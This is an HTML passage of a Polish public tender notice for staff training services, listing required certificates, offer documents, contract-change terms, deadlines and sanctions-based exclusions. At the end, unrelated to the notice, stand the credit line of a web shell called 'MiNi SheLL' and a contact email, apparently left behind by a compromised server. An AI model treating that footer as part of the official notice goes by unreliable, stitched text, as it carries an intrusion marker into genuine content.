potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>d) zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Jeżeli wykonawca nie załączy do oferty wymaganych podmiotowych środków dowodowych, Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących dokumentów, aktualnych na dzień złożenia,<br/> w celu potwierdzenia spełnienia warunków udziału w postępowaniu:<br/>a) WYKAZ WYKONANYCH USŁUG SZKOLENIOWYCH wraz z dowodami określającymi czy te usługi zostały wykonane lub są wykonywane należycie, o których mowa w części VII PODSTAWY WYKLUCZENIA Z POSTĘPOWANIA I WARUNKI UDZIAŁU W POSTĘPOWANIU pkt 3 ppkt 4 lit. a – załącznik nr 4 do SWZ<br/>b)	WYKAZ KADRY DYDAKTYCZNEJ - załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedłożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty i oświadczenia wymagane od wykonawcy składającego ofertę: <br/><br/>1.	FORMULARZ OFERTOWY - załącznik nr 1 do SWZ oraz, jeżeli dotyczy, zobowiązania podmiotu do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia,<br/> Oferty nie należy składać na interaktywnym formularzu generowanym przez platformę E-zamówienia. <br/>2. PRELIMINARZ KOSZTÓW SZKOLENIA - załącznik nr 2 do SWZ.<br/>3. OŚWIADCZENIE O NIEPODLEGANIU WYKLUCZENIU Z POSTĘPOWANIA ORAZ SPEŁNIANIU WARUNKÓW UDZIAŁU W POSTĘPOWANIU - załącznik nr 3 do SWZ.<br/>4. KLAUZULA INFORMACYJNA – załącznik nr 7 do SWZ.<br/>5.	PEŁNOMOCNICTWO do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik. <br/>6.	Do oferty należy dołączyć dokumenty określające w szczególności zakres dostępnych wykonawcy zasobów tego podmiotu, sposób wykorzystania zasobów tego podmiotu przez Wykonawcę przy wykonywaniu zamówienia publicznego, zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego -jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2. Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>3. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>4. W przypadku wspólnego ubiegania się o udzielenie zamówienia oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu składa każdy z Wykonawców, w zakresie, w jakim wykazuje spełnienie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość zmiany treści zawartej umowy szkoleniowej tylko w sytuacjach niedających się przewidzieć do dnia upływu terminu składania ofert lub do dnia zawarcia umowy, jeżeli po stronie Wykonawcy wystąpi konieczność zmiany kadry dydaktycznej, zmiana ta może być dokonana na pisemny wniosek Wykonawcy i wymaga zgody Zamawiającego. Wykładowca, który wejdzie w skład kadry dydaktycznej w wyniku tej zmiany musi mieć doświadczenie w prowadzeniu szkoleń dla pracowników powiatowych urzędów pracy w zakresie stosowania przepisów ustawy o promocji zatrudnienia i instytucjach rynku pracy oraz kwalifikacje zawodowe niezbędne do wykonania zamówienia publicznego nie niższe niż wykładowca, którego będzie zastępował oraz realizować taką samą liczbę godzin i taki sam zakres tematów. Wprowadzenie takiej zmiany możliwe jest na pisemny wniosek Wykonawcy po uzyskaniu pisemnej zgody Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-25 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl 1. W celu złożenia oferty, należy przejść do szczegółów postępowania, wybrać zakładkę „Oferty/wnioski” i kliknąć przycisk „Złóż ofertę”. Składanie ofert dostępne jest tylko dla użytkowników będących Wykonawcami, posiadającymi rolę „Składanie ofert/wniosków/prac konkursowych”.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-25 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Na podstawie art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego(Dz.U. 2024 r. poz. 507 z późn.zm.) z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych wyklucza się:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023 r. poz. 1124, 1285, 1723 i 1843) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120, 295 i 1598) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3.

Creat By MiNi SheLL
Email: jattceo@gmail.com